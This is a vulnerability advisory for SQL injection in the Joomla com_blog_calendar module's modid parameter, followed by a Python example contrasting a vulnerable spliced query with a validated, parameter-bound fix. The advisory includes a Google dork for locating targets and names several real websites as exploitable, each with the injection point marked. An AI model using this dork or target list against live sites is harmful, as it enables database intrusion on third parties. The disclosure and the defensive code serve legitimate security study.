Joomla Blog Calendar SQL Injection

2016.12.27
Credit: X-Cisadane
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

==========================================================================================
Joomla com_blog_calendar SQL Injection Vulnerability
==========================================================================================

# Exploit Title  : Joomla com_blog_calendar SQL Injection Vulnerability
# Date           : 26th December 2016
# Author         : X-Cisadane
# CMS Name       : Joomla
# CMS Developer  : http://joomlacode.org/gf/project/blog_calendar/
# Category       : Web Application
# Vulnerability  : SQL Injection
# Tested On      : SQLMap 1.0.12.9#dev
# Greetz to      : X-Code YogyaFree, ExploreCrew, CodeNesia, Bogor Hackers Community, Borneo Crew, Depok Cyber, Mantan

A SQL Injection vulnerability has been discovered in the Joomla module com_blog_calendar. The vulnerability is located in the modid parameter of index.php?option=com_blog_calendar&modid=xxx. Attackers are able to execute their own SQL commands by sending a GET request with a manipulated modid value, and can thereby read database information.
DORKS (How to find the target) :
================================
inurl:/index.php?option=com_blog_calendar
Or use your own Google Dorks :)

Proof of Concept
================
SQL Injection PoC :
http://[Site]/[Path]/index.php?option=com_blog_calendar&modid=['SQLi]

Screenshot (PoC) :
http://i64.tinypic.com/2rqhhk4.png

Example of Vuln Sites :
https://www.zen-road.org/index.php?option=com_blog_calendar&modid=['SQLi]
http://www3.unitus.it/index.php?option=com_blog_calendar&modid=['SQLi]
http://chausyleshoz.by/en/index.php?option=com_blog_calendar&modid=['SQLi]
http://www.foms.kg/index.php?option=com_blog_calendar&modid=['SQLi]
http://www.iab.com.bd/index.php?option=com_blog_calendar&modid=['SQLi]
... etc ...
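The advisory names the defect class (CWE-89) and the parameter (modid) but not the module's code. The following is an added, self-contained illustration written for this page, not code from the advisory or from the com_blog_calendar module: a stand-in "modules" table in an in-memory SQLite database (constructed sample rows), a lookup that splices the raw GET value into the statement the way a CWE-89 bug does, and a hardened lookup that accepts only a decimal integer and binds it as a parameter. Feeding the advisory's probe shape (a value ending in a quote) shows why the vulnerable form hands control of the SQL to the request while the hardened form simply returns nothing. Table and column names are assumptions.

```python
import sqlite3
from typing import Optional, Tuple

# Constructed sample data standing in for a Joomla module table; the real
# com_blog_calendar schema is not shown on the page (assumption).
SAMPLE_ROWS = [(11, "Blog Calendar"), (12, "Login Form"), (13, "Search")]


def _db() -> sqlite3.Connection:
    """Build a fresh in-memory database holding the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE modules (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO modules VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def lookup_module_vulnerable(modid: str) -> Optional[Tuple[int, str]]:
    """CWE-89 pattern: the raw request value becomes part of the SQL text.

    Any character the caller places in `modid` is parsed by the database as
    SQL, so a stray quote (or anything else) changes the statement itself.
    """
    conn = _db()
    sql = "SELECT id, title FROM modules WHERE id = " + modid
    return conn.execute(sql).fetchone()


def parse_modid(raw: str) -> Optional[int]:
    """Accept only a decimal integer, the one shape a module id can take."""
    raw = raw.strip()
    if not raw.isdecimal():
        return None
    return int(raw)


def lookup_module_hardened(modid: str) -> Optional[Tuple[int, str]]:
    """Validate the type first, then bind the value instead of splicing it."""
    mid = parse_modid(modid)
    if mid is None:
        return None  # reject rather than let the database see the text
    conn = _db()
    return conn.execute(
        "SELECT id, title FROM modules WHERE id = ?", (mid,)
    ).fetchone()


def vulnerable_query_is_broken_by(modid: str) -> bool:
    """True when the vulnerable lookup lets the value alter the SQL parse.

    A database syntax error on request-controlled input is the symptom a
    defender sees in logs when this class of bug is being probed.
    """
    try:
        lookup_module_vulnerable(modid)
    except sqlite3.Error:
        return True
    return False


if __name__ == "__main__":
    probe = "12'"  # the advisory's probe shape: a quote appended to the id
    print("hardened, normal id :", lookup_module_hardened("12"))
    print("hardened, probe     :", lookup_module_hardened(probe))
    print("vulnerable breaks   :", vulnerable_query_is_broken_by(probe))
```

The fix has two parts that should both be present: a type check on the parameter (an integer id should never contain a quote) and parameter binding, which keeps data and SQL text separate even when a string value is legitimately needed. Either one alone covers most cases; together they also make a web application firewall or log monitor's job easier, because any non-numeric modid reaching the server is unambiguously a probe.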

